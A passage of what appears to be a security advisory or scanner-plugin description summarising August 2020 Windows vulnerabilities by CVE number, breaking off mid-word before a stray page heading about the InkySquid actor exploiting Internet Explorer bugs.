(CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfull

InkySquid State Actor Exploiting Known IE Bugs

Description

Related